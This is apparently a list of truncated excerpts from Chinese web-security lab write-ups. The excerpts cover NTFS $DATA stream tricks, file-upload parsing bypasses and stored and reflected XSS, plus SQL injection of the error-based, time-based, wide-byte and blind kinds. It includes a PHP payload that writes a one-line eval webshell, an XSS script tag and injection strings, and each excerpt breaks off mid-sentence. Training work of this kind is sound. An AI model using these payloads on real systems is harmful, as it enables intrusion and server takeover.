$DATA是在NTFS文件系统中存储数据流的属性之一，即文件的主数据流（NTFS文件系统允许一个文件有多个流，但是至少有一个未命名流即主流），当我们访问a.asp::$DATA时就是请求的a.asp本身的数据，如果a.asp还包含了其他数据流，比如a.asp:lake2.asp，请求a.asp:lake2.asp:$DATA即是a.asp中的流数据lake2.asp的流数据内容 http

在默认Fast-CGI开启状况下,可以上传一个名字为xx.jpg，内容为<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>然后访问xx.jpg/.php,在这个目录下就会生成一句话木马shell.php 靶场地址http://120.2

RANK1上传点http://120.203.13.75:8125/Pass-20/index.php默认解析：IIS6默认可执行的后缀名，上传绕过时，改成以下后缀名，asp语法可以正常执行.asp.aspx.asa.cer.cdx 查看提示 修改文件后缀名，将图片一句话木马xx.jpg修改为xx.cer，点击浏览，上传 提示非法的文件格式 换一种方式绕过上

存储型XSShttp://117.41.229.122:8082 打开之后发现是FineCMS 5.3.0的版本，通过搜索引擎搜索出该版本存在XSS存储型漏洞FineCMS 5.3.0存储型XSS漏洞详细说明：https://www.jianshu.com/p/200ea62486d9FineCMS 5.3.0代码审计Getshell详细说明：https://www.freebuf.co

反射型XSShttp://120.203.13.75:6815/xss/输入1搜索，发现有页面返回相同的内容，可能存在XSS 查看元素，观察语句是怎么构成的 尝试从value的双引号中逃逸出来，让其执行，于是尝试"1查看元素，发现双引号并不能让"1逃逸出来 尝试"1 <script>alert(1)</script&gt

RANK1注入点（POST方式）http://120.203.13.75:8150/New/PostBased/RankOne/sql-one/ 单引号报错：' 返回报错信息，有可能是注入点 闭合并注释：'# 返回正常，闭合注释成功 猜解列数：' order by 2# 返回正常，说明列数等于2 显示数据的输出显示位置:' u

请求：GET / HTTP/1.1（客户端的HTTP协议版本信息）Host（需要访问的主机名，客户端指定自己想访问的WEB服务器的域名/IP地址和端口号）User-Agent（客户端使用的操作系统和浏览器的名称和版本，很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据库中）Accept（客户端浏览器可以接受的媒体类型，通配符*代表任意类型）Date（生成消息的具体时间和日期，GMT

延时注入，即通过在sql语句中插入时间函数sleep(),通过sql执行的时间来进行判断插入的sql语句是否成功被执行 if函数有三个参数，语法如下：if(条件判断, 结果为真返回值, 结果为假返回值) RANK1注入点：http://120.203.13.75:8150/New/TimeBased/RankOne/sql-one/?id=1 单引号报错：http:/

宽字节注入条件：目标使用 addslashes函数或是开启PHP的GPCGBK 占用两字节，ASCII占用一字节，PHP中编码为GBK，函数执行添加的是ASCII编码，MYSQL默认字符集是GBK等宽字节字符集 宽字节注入原理：前端输入%df%27时首先经过上面addslashes函数转义变成了%df%5c%27（%5c是反斜杠\），之后在数据库查询前因为设置了GBK编码，即是在汉字编码

盲注一般用于服务器没有给出sql执行后的回显，分为两类：布尔盲注（布尔很明显Ture跟Fales，也就是说它只会根据你的注入信息返回Ture跟Fales，也就没有了之前的报错信息）时间盲注（界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数，通过查看web页面返回的时间差来判断注入的语句是否正确） 盲注涉及的函数：length() 函数 返回字符